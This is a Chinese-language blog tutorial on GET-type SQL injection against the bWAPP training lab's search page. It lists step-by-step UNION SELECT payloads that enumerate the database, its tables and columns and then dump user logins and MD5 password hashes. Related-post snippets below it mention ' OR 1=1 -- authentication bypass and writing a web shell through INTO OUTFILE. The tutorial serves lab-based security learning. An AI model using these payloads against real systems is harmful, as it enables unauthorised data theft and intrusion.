SQL注入之GET型(search)

已于 2022-05-28 19:48:00 修改
阅读量687 收藏 1
点赞数
文章标签: web安全 安全
于 2022-05-28 16:43:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48335646/article/details/125019761
版权

0x01:测试分析

我们进行测试这里是否存在SQL注入漏洞

输入a'

点击搜索后

报错了,说明很大可能存在SQL注入漏洞了。

0x02:爆字段(字段就是这个数据表中的列)

order by 语句

输入 a' order by 1 #

输入a' order by 7#

输入a' order by 8#

由此可以判断出,库中有7个列。

0x03:爆数据库名

使用联合查询注入union

输入a' union select 1,2,3,4,5,6,7#

可以看出是从2开始显示。

可以将2,3,5,4,替换成我们想要查询的信息

相关函数

system_user()         系统用户名
user()                用户名
current_user          当前用户名
session_user()        连接数据库的用户名
database()            数据库名
version()             MYSQL数据库版本
load_file()           MYSQL读取本地文件的函数
@@datadir             读取数据库路径
@@basedir             MYSQL 安装路径
@@version_compile_os  操作系统

输入a' union select 1,database(),3,4,5,6,7#

可见当前数据库为bwapp 

0x04:爆表(即获取当前数据表)

输入a' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()#

当前数据库(bwapp)中,有五张表,其中users比较重要。

0x05:获取后台账户用户名和密码 

先查看users表的所有的列的信息

输入a' union select 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='users'#

一共有9列。

其中的login和password,应该是我们有我们想要的东西。

那我们就去查出它们的信息

输入a' union select 1,login,password,4,5,6,7 from users#

 获取login信息和password密码

 其中密码是经过md5加密,我们需要去解密

blue Hat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql search
04-01
非常好用的sql server 搜索工具。sql search sql search
Python实现SQL注入检测插件实例代码
09-19
随着互联网技术的迅速发展,Web应用程序面临着各种安全威胁,其中SQL注入是最常见也是最危险的一种攻击方式之一。为了保护Web应用程序免受此类攻击,开发人员经常需要借助自动化工具来进行SQL注入漏洞的检测与防范。...
webgote的例子(2)Sql注入(SearchGET)
时光凉春衫薄的博客
03-25 265
Sql注入Search/GET)   大家好!!! 现如今web服务在我们的网络上遍地都是,各个终端设备成为我们看不见的客户,web服务也成为公司的招牌。80 443为我们展现的视角也是多姿多彩但背后新闻爆出的安全风险事故有时也让我们触目惊心,近年来随着各个公司网络安全意识不断提高发生的安全事故也明显下降,但更高级的攻击手段也时时刻刻让企业面临着挑战。如今不妨让我们了解一下这些攻击的原...
SQL注入入门攻略 SQL-LABS靶场 第1关 基于GET请求方式注入 ~
Jiuchen的博客
06-29 604
打开PhpStudy启动apache和mysql设置网站根目录指向保存的sql-labs目录 修改sql-labs数据库连接配置文件在sql-labs目录下的sql-connections/db-creds.inc文件改为自己实际的mysql账号和密码 默认为root/root 启用网站 (我的网站端口是8091)访问http://127.0.0.1:8091 页面打开效果图 安装security数据库点击页面中 Setup/reset Database for labs 至此 sql-labs搭建完成.
SQL注入——GET类
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-03 3000
SQL注入——GET类 靶场地址 原理: sql注入就是利用GET传参,用户提交数据与数据库进行交互,从数据库中提取有用的信息 第一题: 我们先在url栏测试一下,把id=1改成id=-1 结果页面就不显示了 表示存在sql注入漏洞我们再查看一下源码,发现它是自动闭合的,不需要我们输入代码闭合 接着,我在url轮流输入 order by 1,2,3.... 测试出它页面字段总数 在输入...
SQL注入之GET
最新发布
qq_51393133的博客
09-11 1006
每个数据库都有一个"table_schema"字段,存放的是该数据库的名字。一个数据库有很多表,每个表都有"table_name"字段,存放的是各个表的名字。
sqlinject-sql注入资料
09-12
SELECT * FROM users WHERE name = '$_GET['search']' ``` 如果攻击者输入 `' OR 1=1 --` ,则查询变为: ```sql SELECT * FROM users WHERE name = '' OR 1=1 -- ``` 这将绕过认证逻辑,返回所有用户记录。 ###...
关于sql注入攻击介绍
02-21
综上所述,SQL注入是当前网络环境中常见的安全威胁之一。通过对常见攻击手段的了解和学习,以及采取有效的预防措施,可以大大降低网站受到此类攻击的风险。作为网站开发者,应当不断提高自身的安全意识和技术水平,...
elasticsearch-sql插件
10-16
虽然Elasticsearch-SQL插件提供了方便,但也需要防范SQL注入攻击,确保输入的SQL语句经过适当验证和转义。 **五、与其他系统的集成** 1. **JDBC驱动** Elasticsearch-SQL插件还提供了JDBC(Java Database ...
【实战篇】第20篇:SQL二次编码注入漏洞实例(附tamper脚本)1
08-03
如果我们传入双重url编码的字符串,将绕过非法字符检测,然后经urldecode解码,带入数据库中执行,导致SQL注入漏洞存在。 三、漏洞利用 1. 双重URLencode编码绕过:通过编写tamper脚本,可以绕过URLencode双重编码...
SQLSearch插件工具
01-07
SQLSearch,SQLSERVer插件方便快速查找调用关系,筛选试图存储过程
SQL数字GET注入
Snowflake1997的博客
02-16 838
访问SQLi-Labs网站 在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的SQLi-Labs网站Less-2。访问的URL为: http://[靶机IP]/sqli-labs/Less-2/ 登录后,根据网页提示,给定一个GET参数,即: http://[靶机IP]/sqli-labs/Less-2/?id=1 此时页面显示id=1的用户名Dump、密码Dump。 以此来检验浏览器是否安装Hackbar插件,界面F9按键是启用或停用。 寻找
SQL注入之GET常规注入
Jim的博客
08-14 4448
less1单引号字符串注入 源码:$sql="select * from users where id='$id' limit 0,1"; $result=mysql_query($sql); $row=mysql_fetch_array($result); 注入:?id=1' or '1'='1  或者?id=1' or 1=1--%20 构建sql语句:?id=1' union se
SQL 注入 GET
LINGX5的博客
07-25 345
简单的SQL注入
webgote的例子(3)Sql注入(SearchPOST)
时光凉春衫薄的博客
03-25 509
Sql注入Search/POST) (本章内容):post的方式进行注入 今天来讲一下sql注入的另一个例子(post) 上一个用的是get请求的方法将我们的参数传到服务器进行执行   上图中的标红是需要注意的地方。我们查询的参数都是可以通过url进行传递的title=什么就代表我们查什么。   然而post这个例子中设计者改变了这种方法选择了另外的提交方式。这时候我们在url中注入...
get基于报错的sql注入
冷巷(✘_✘)的博客
07-14 1084
目录1.SQL注入的分类数字字符2.get基于报错的sql注入发现3.get基于报错的sql注入利用1.利用order by 判断字段数。2.利用union select 联合查询,获取表名。3.利用union select联合查询,获取字段名。4.利用union select 联合查询,获取字段值。4.利用sqlmap测试根据注入为数据类可将sql注入分为数字和字符。例如 字符 例如 2.get基于报错的sql注入发现 通过在url中修改对应的id值,为正常数字、打数字、字符(单引
GETsql注入教学
m0_67265441的博客
01-29 790
sql注入的原理:攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的。这说明后台在接受id这一个参数时and 1=1(真值),and 1=2(假值)生效了。第二步:判断列长度(靶场利用sqli-labs做为演示),以此来利用服务器进行恶意操作(一部分借鉴百度百科)。利用order by 语句和2分法可以判断出列长度为3。第三步:利用UNION SELECT判断回显位。通过刚刚的回显位来吧代码插入其中。第七步:通过列名把数据都列出来。第六步:通过表名查询列名。第一步:判断页面真假值。
sql中GET参数的讲解
qq_41306131的博客
12-03 1882
SQL中接收参数 单引号包括 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1" 加上1’ 报错 可以用 1‘ -++ 或者 #(%23) 注释 这里单引号和#只是用来注释 报错的话需要 id=-1 整数 $sql="SELECT *FROM users WHERE id=$id LIMIT 0,1"; 加上1‘ 报错为 使用’报错会...
SQL 登录注入脚本_GETsql注入防御脚本绕过案例剖析
weixin_39627405的博客
11-21 135
复现条件环境:windows7+phpstudy2018+php5.4.45+apache 程序框架:damicms 2014条件:需要登录特点:属于GET注入,且存在防御脚本,防御方法复现漏洞我们先注册个账号。账号test0 密码test0登陆进行场景复现, 访问链接:http://localhost/test0/index.php?s=/api/ajax_arclist/mo...
sql注入getshell的条件
07-27
回答: SQL注入getshell的条件包括以下几个方面:首先,目标网站必须存在SQL注入漏洞,即用户输入的数据没有经过充分的过滤和验证,直接拼接到SQL语句中。其次,攻击者需要了解目标网站的数据库类和版本,以便构造相应的注入语句。接下来,攻击者需要找到可以写入文件的注入点,通常是通过使用INTO OUTFILE语句将恶意代码写入服务器上的文件。最后,攻击者需要具备足够的权限来执行写入文件的操作,否则注入将失败。总之,SQL注入getshell的条件包括漏洞存在、数据库类和版本、可写入文件的注入点和足够的权限。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [SQL注入getshell](https://blog.csdn.net/cjx529377/article/details/106418511)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [SQL注入-getshell](https://blog.csdn.net/LJH1999ZN/article/details/122951715)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值